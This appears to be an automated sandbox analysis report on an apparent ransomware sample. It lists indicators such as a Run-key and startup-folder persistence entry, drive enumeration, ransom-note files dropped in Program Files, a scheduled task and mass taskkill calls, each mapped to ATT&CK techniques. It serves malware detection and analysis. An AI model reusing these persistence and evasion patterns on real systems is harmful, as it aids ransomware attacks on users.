87300e6563c7ac9d8d758b219d135fb8b84a7788419a0ddd8c3470cc1e739eae

System Information Discovery

Processes:

cmd.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

Processes:

NoFile.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe	NoFile.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe	NoFile.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Machin_Update = "c:\\$Recycle.Bin\\RCRU_64.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Machin_Update = "c:\\$Recycle.Bin\\RCRU_64.exe"	reg.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

NoFile.exe

description	ioc	process
File opened (read-only)	\??\i:	NoFile.exe
File opened (read-only)	\??\u:	NoFile.exe
File opened (read-only)	\??\N:	NoFile.exe
File opened (read-only)	\??\U:	NoFile.exe
File opened (read-only)	\??\Z:	NoFile.exe
File opened (read-only)	\??\f:	NoFile.exe
File opened (read-only)	\??\q:	NoFile.exe
File opened (read-only)	\??\x:	NoFile.exe
File opened (read-only)	\??\G:	NoFile.exe
File opened (read-only)	\??\I:	NoFile.exe
File opened (read-only)	\??\L:	NoFile.exe
File opened (read-only)	\??\h:	NoFile.exe
File opened (read-only)	\??\w:	NoFile.exe
File opened (read-only)	\??\y:	NoFile.exe
File opened (read-only)	\??\A:	NoFile.exe
File opened (read-only)	\??\F:	NoFile.exe
File opened (read-only)	\??\M:	NoFile.exe
File opened (read-only)	\??\r:	NoFile.exe
File opened (read-only)	\??\Y:	NoFile.exe
File opened (read-only)	\??\m:	NoFile.exe
File opened (read-only)	\??\b:	NoFile.exe
File opened (read-only)	\??\e:	NoFile.exe
File opened (read-only)	\??\n:	NoFile.exe
File opened (read-only)	\??\v:	NoFile.exe
File opened (read-only)	\??\B:	NoFile.exe
File opened (read-only)	\??\J:	NoFile.exe
File opened (read-only)	\??\R:	NoFile.exe
File opened (read-only)	\??\S:	NoFile.exe
File opened (read-only)	\??\p:	NoFile.exe
File opened (read-only)	\??\z:	NoFile.exe
File opened (read-only)	\??\Q:	NoFile.exe
File opened (read-only)	\??\T:	NoFile.exe
File opened (read-only)	\??\W:	NoFile.exe
File opened (read-only)	\??\l:	NoFile.exe
File opened (read-only)	\??\o:	NoFile.exe
File opened (read-only)	\??\k:	NoFile.exe
File opened (read-only)	\??\g:	NoFile.exe
File opened (read-only)	\??\E:	NoFile.exe
File opened (read-only)	\??\O:	NoFile.exe
File opened (read-only)	\??\P:	NoFile.exe
File opened (read-only)	\??\a:	NoFile.exe
File opened (read-only)	\??\j:	NoFile.exe
File opened (read-only)	\??\t:	NoFile.exe
File opened (read-only)	\??\s:	NoFile.exe
File opened (read-only)	\??\H:	NoFile.exe
File opened (read-only)	\??\K:	NoFile.exe
File opened (read-only)	\??\V:	NoFile.exe
File opened (read-only)	\??\X:	NoFile.exe

Drops file in Program Files directory 64 IoCs

Processes:

NoFile.exe

description	ioc	process
File created	\??\c:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad\Read_Me!_.txt	NoFile.exe
File created	\??\c:\Program Files\Common Files\microsoft shared\ink\sl-SI\Read_Me!_.txt	NoFile.exe
File created	\??\c:\Program Files\Common Files\microsoft shared\Source Engine\Read_Me!_.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\System\Ole DB\msdasql.dll	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\jre\bin\dtplugin\npdeployJava1.dll	NoFile.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\eo.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\gu.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\microsoft shared\ClickToRun\cpprestsdk.dll	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\jre\COPYRIGHT	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.ja_5.5.0.165303.jar	NoFile.exe
File created	\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\Read_Me!_.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\epl-v10.html	NoFile.exe
File opened for modification	\??\c:\Program Files\Internet Explorer\fr-FR\iexplore.exe.mui	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\jre\bin\jawt.dll	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\jre\lib\currency.data	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\bin\ktab.exe	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\meta-index	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.pl-pl.dll	NoFile.exe
File created	\??\c:\Program Files\Common Files\microsoft shared\VGX\Read_Me!_.txt	NoFile.exe
File created	\??\c:\Program Files\Common Files\System\ado\de-DE\Read_Me!_.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\microsoft shared\ink\en-US\tipresx.dll.mui	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad.xml	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_kor.xml	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\jre\bin\instrument.dll	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\jre\bin\javafx_font.dll	NoFile.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\id.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\mk.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\jre\bin\ssvagent.exe	NoFile.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\uz.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\sk.pak	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\bin\javafxpackager.exe	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.sk-sk.dll	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\System\msadc\it-IT\msdaremr.dll.mui	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html	NoFile.exe
File created	\??\c:\Program Files\Common Files\microsoft shared\VSTO\Read_Me!_.txt	NoFile.exe
File created	\??\c:\Program Files\Common Files\System\es-ES\Read_Me!_.txt	NoFile.exe
File created	\??\c:\Program Files\Common Files\System\Ole DB\de-DE\Read_Me!_.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\jre\lib\jvm.hprof.txt	NoFile.exe
File created	\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\Read_Me!_.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\es.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\microsoft shared\ClickToRun\AppVOrchestration.dll	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\microsoft shared\ink\it-IT\TabTip.exe.mui	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui	NoFile.exe
File created	\??\c:\Program Files\Common Files\System\ado\ja-JP\Read_Me!_.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\System\msadc\fr-FR\msadcer.dll.mui	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui	NoFile.exe
File opened for modification	\??\c:\Program Files\Google\Chrome\Application\89.0.4389.114\89.0.4389.114.manifest	NoFile.exe
File opened for modification	\??\c:\Program Files\7-Zip\descript.ion	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\microsoft shared\ink\fr-FR\TipRes.dll.mui	NoFile.exe
File created	\??\c:\Program Files\Common Files\microsoft shared\MSInfo\ja-JP\Read_Me!_.txt	NoFile.exe
File created	\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\Read_Me!_.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.alert_5.5.0.165303.jar	NoFile.exe
File opened for modification	\??\c:\Program Files\7-Zip\Lang\af.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\microsoft shared\ClickToRun\msvcp140.dll	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\microsoft shared\ink\ipsptg.xml	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\microsoft shared\ink\it-IT\tipresx.dll.mui	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkServerCP	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.8.0_66\jre\bin\jaas_nt.dll	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\microsoft shared\ink\cs-CZ\tipresx.dll.mui	NoFile.exe

Drops file in Windows directory 4 IoCs

Processes:

NoFile.exesvchost.exeTiWorker.exe

description	ioc	process
File created	C:\Windows\Pagesfilo.sys	NoFile.exe
File opened for modification	C:\Windows\Pagesfilo.sys	NoFile.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat	svchost.exe
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

MusNotifyIcon.exe

description	ioc	process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MusNotifyIcon.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	MusNotifyIcon.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1276 schtasks.exe

pid	process
1276	schtasks.exe

Delays execution with timeout.exe 10 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
228	timeout.exe
3084	timeout.exe
3144	timeout.exe
3468	timeout.exe
1508	timeout.exe
3388	timeout.exe
2868	timeout.exe
3500	timeout.exe
3780	timeout.exe
2984	timeout.exe

Enumerates processes with tasklist 1 TTPs 11 IoCs

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	process
3680	tasklist.exe
1356	tasklist.exe
1588	tasklist.exe
1932	tasklist.exe
1556	tasklist.exe
1748	tasklist.exe
2060	tasklist.exe
3912	tasklist.exe
3012	tasklist.exe
3532	tasklist.exe
2364	tasklist.exe

Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exesysteminfo.exe

pid process

3324 systeminfo.exe
616 systeminfo.exe

pid	process
3324	systeminfo.exe
616	systeminfo.exe

Kills process with taskkill 40 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
2180	taskkill.exe
1668	taskkill.exe
3988	taskkill.exe
2708	taskkill.exe
1556	taskkill.exe
3584	taskkill.exe
2872	taskkill.exe
3588	taskkill.exe
2148	taskkill.exe
3004	taskkill.exe
312	taskkill.exe
1584	taskkill.exe
1748	taskkill.exe
796	taskkill.exe
2944	taskkill.exe
1580	taskkill.exe
2912	taskkill.exe
2080	taskkill.exe
2968	taskkill.exe
1260	taskkill.exe
3496	taskkill.exe
3008	taskkill.exe
3260	taskkill.exe
2572	taskkill.exe
2780	taskkill.exe
2064	taskkill.exe
3516	taskkill.exe
3388	taskkill.exe
1276	taskkill.exe
2784	taskkill.exe
3480	taskkill.exe
644	taskkill.exe
1184	taskkill.exe
1560	taskkill.exe
2760	taskkill.exe
3936	taskkill.exe
4068	taskkill.exe
3076	taskkill.exe
632	taskkill.exe
1136	taskkill.exe

Modifies data under HKEY_USERS 47 IoCs

Processes:

svchost.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DownloadMode_BackCompat = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "6.818211"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "3984"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCacheHostBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132887891186226019"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyLanBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4124"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyGroupBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthID = "2"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\InternetConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.000000"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config	svchost.exe

Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings cmd.exe
Modifies registry key 1 TTPs 3 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exe

pid process

3212 reg.exe
1828 reg.exe
1128 reg.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

tasklist.exetasklist.exe

pid process

3012 tasklist.exe
3012 tasklist.exe
1556 tasklist.exe
1556 tasklist.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings	cmd.exe

pid	process
3212	reg.exe
1828	reg.exe
1128	reg.exe

pid	process
3012	tasklist.exe
3012	tasklist.exe
1556	tasklist.exe
1556	tasklist.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

tasklist.exetasklist.exeTiWorker.exetasklist.exetasklist.exeWMIC.exevssvc.exetasklist.exetasklist.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	3012	tasklist.exe
Token: SeDebugPrivilege	1556	tasklist.exe
Token: SeSecurityPrivilege	832	TiWorker.exe
Token: SeRestorePrivilege	832	TiWorker.exe
Token: SeBackupPrivilege	832	TiWorker.exe
Token: SeDebugPrivilege	3532	tasklist.exe
Token: SeDebugPrivilege	1748	tasklist.exe
Token: SeIncreaseQuotaPrivilege	2172	WMIC.exe
Token: SeSecurityPrivilege	2172	WMIC.exe
Token: SeTakeOwnershipPrivilege	2172	WMIC.exe
Token: SeLoadDriverPrivilege	2172	WMIC.exe
Token: SeSystemProfilePrivilege	2172	WMIC.exe
Token: SeSystemtimePrivilege	2172	WMIC.exe
Token: SeProfSingleProcessPrivilege	2172	WMIC.exe
Token: SeIncBasePriorityPrivilege	2172	WMIC.exe
Token: SeCreatePagefilePrivilege	2172	WMIC.exe
Token: SeBackupPrivilege	2172	WMIC.exe
Token: SeRestorePrivilege	2172	WMIC.exe
Token: SeShutdownPrivilege	2172	WMIC.exe
Token: SeDebugPrivilege	2172	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2172	WMIC.exe
Token: SeRemoteShutdownPrivilege	2172	WMIC.exe
Token: SeUndockPrivilege	2172	WMIC.exe
Token: SeManageVolumePrivilege	2172	WMIC.exe
Token: 33	2172	WMIC.exe
Token: 34	2172	WMIC.exe
Token: 35	2172	WMIC.exe
Token: 36	2172	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2172	WMIC.exe
Token: SeSecurityPrivilege	2172	WMIC.exe
Token: SeTakeOwnershipPrivilege	2172	WMIC.exe
Token: SeLoadDriverPrivilege	2172	WMIC.exe
Token: SeSystemProfilePrivilege	2172	WMIC.exe
Token: SeSystemtimePrivilege	2172	WMIC.exe
Token: SeProfSingleProcessPrivilege	2172	WMIC.exe
Token: SeIncBasePriorityPrivilege	2172	WMIC.exe
Token: SeCreatePagefilePrivilege	2172	WMIC.exe
Token: SeBackupPrivilege	2172	WMIC.exe
Token: SeRestorePrivilege	2172	WMIC.exe
Token: SeShutdownPrivilege	2172	WMIC.exe
Token: SeDebugPrivilege	2172	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2172	WMIC.exe
Token: SeRemoteShutdownPrivilege	2172	WMIC.exe
Token: SeUndockPrivilege	2172	WMIC.exe
Token: SeManageVolumePrivilege	2172	WMIC.exe
Token: 33	2172	WMIC.exe
Token: 34	2172	WMIC.exe
Token: 35	2172	WMIC.exe
Token: 36	2172	WMIC.exe
Token: SeBackupPrivilege	3896	vssvc.exe
Token: SeRestorePrivilege	3896	vssvc.exe
Token: SeAuditPrivilege	3896	vssvc.exe
Token: SeDebugPrivilege	2060	tasklist.exe
Token: SeDebugPrivilege	3680	tasklist.exe
Token: SeDebugPrivilege	3496	taskkill.exe
Token: SeDebugPrivilege	3076	taskkill.exe
Token: SeDebugPrivilege	3008	taskkill.exe
Token: SeDebugPrivilege	3516	taskkill.exe
Token: SeDebugPrivilege	1560	taskkill.exe
Token: SeDebugPrivilege	3480	taskkill.exe
Token: SeDebugPrivilege	644	taskkill.exe
Token: SeDebugPrivilege	3004	taskkill.exe
Token: SeDebugPrivilege	3260	taskkill.exe
Token: SeDebugPrivilege	1748	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

NoFile.execmd.execmd.execmd.execmd.exeWScript.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3436 wrote to memory of 3064	3436	NoFile.exe	cmd.exe
PID 3436 wrote to memory of 3064	3436	NoFile.exe	cmd.exe
PID 3436 wrote to memory of 3064	3436	NoFile.exe	cmd.exe
PID 3064 wrote to memory of 3012	3064	cmd.exe	tasklist.exe
PID 3064 wrote to memory of 3012	3064	cmd.exe	tasklist.exe
PID 3064 wrote to memory of 3012	3064	cmd.exe	tasklist.exe
PID 3064 wrote to memory of 1952	3064	cmd.exe	findstr.exe
PID 3064 wrote to memory of 1952	3064	cmd.exe	findstr.exe
PID 3064 wrote to memory of 1952	3064	cmd.exe	findstr.exe
PID 3436 wrote to memory of 3484	3436	NoFile.exe	cmd.exe
PID 3436 wrote to memory of 3484	3436	NoFile.exe	cmd.exe
PID 3436 wrote to memory of 3484	3436	NoFile.exe	cmd.exe
PID 3436 wrote to memory of 3444	3436	NoFile.exe	cmd.exe
PID 3436 wrote to memory of 3444	3436	NoFile.exe	cmd.exe
PID 3436 wrote to memory of 3444	3436	NoFile.exe	cmd.exe
PID 3444 wrote to memory of 3516	3444	cmd.exe	WScript.exe
PID 3444 wrote to memory of 3516	3444	cmd.exe	WScript.exe
PID 3444 wrote to memory of 3516	3444	cmd.exe	WScript.exe
PID 3436 wrote to memory of 3888	3436	NoFile.exe	cmd.exe
PID 3436 wrote to memory of 3888	3436	NoFile.exe	cmd.exe
PID 3436 wrote to memory of 3888	3436	NoFile.exe	cmd.exe
PID 3888 wrote to memory of 1276	3888	cmd.exe	schtasks.exe
PID 3888 wrote to memory of 1276	3888	cmd.exe	schtasks.exe
